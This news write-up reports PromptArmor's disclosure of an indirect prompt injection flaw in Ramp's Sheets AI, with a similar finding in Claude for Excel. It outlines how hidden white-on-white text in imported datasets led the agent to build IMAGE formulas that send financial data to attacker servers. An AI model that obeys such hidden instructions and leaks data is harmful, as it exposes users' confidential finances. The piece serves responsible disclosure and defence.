Security Researchers Disclose Prompt Injection Vulnerability in Ramp's Sheets AI Enabling Financial Data Exfiltration
Key Takeaways
- ▸Ramp's Sheets AI was vulnerable to indirect prompt injection attacks hidden in white-on-white text within external datasets, allowing autonomous data exfiltration
- ▸The attack exploited the agent's ability to insert formulas and make network requests without user approval, with malicious IMAGE formulas designed to transmit financial data to attacker servers
- ▸Ramp patched the vulnerability on March 16, 2026, after a responsible disclosure process beginning February 19, 2026
Summary
Security researchers at PromptArmor discovered a critical indirect prompt injection vulnerability in Ramp's Sheets AI that could enable attackers to exfiltrate sensitive financial data without user approval. The vulnerability allowed the AI agent to insert malicious formulas into spreadsheets that trigger external network requests, transmitting confidential data to attacker-controlled servers. By embedding hidden prompt injections in external datasets that users import for analysis, attackers could trick the AI into generating IMAGE formulas containing sensitive financial information. Ramp's security team resolved the issue on March 16, 2026, following responsible disclosure initiated on February 19. The research also identified similar vulnerabilities in Claude for Excel, highlighting a broader class of risks in agentic spreadsheet tools that operate without human-in-the-loop approval for external communication.
- Similar vulnerabilities were identified in Claude for Excel, demonstrating systemic risks in agentic tools that operate on sensitive data without sufficient safeguards against indirect injection attacks
Editorial Opinion
This disclosure reveals a critical vulnerability in the current generation of agentic spreadsheet tools: autonomous operations on financial data create severe exfiltration risks when combined with indirect prompt injection techniques. The attack's success in exploiting white-on-white text demonstrates how AI agents struggle to distinguish between legitimate instruction and adversarial input embedded in external datasets. Organizations adopting autonomous spreadsheet agents should demand mandatory human approval for any external network requests and enhanced detection of prompt injection patterns. Without these safeguards, the efficiency gains of agentic tools come at an unacceptable security cost.



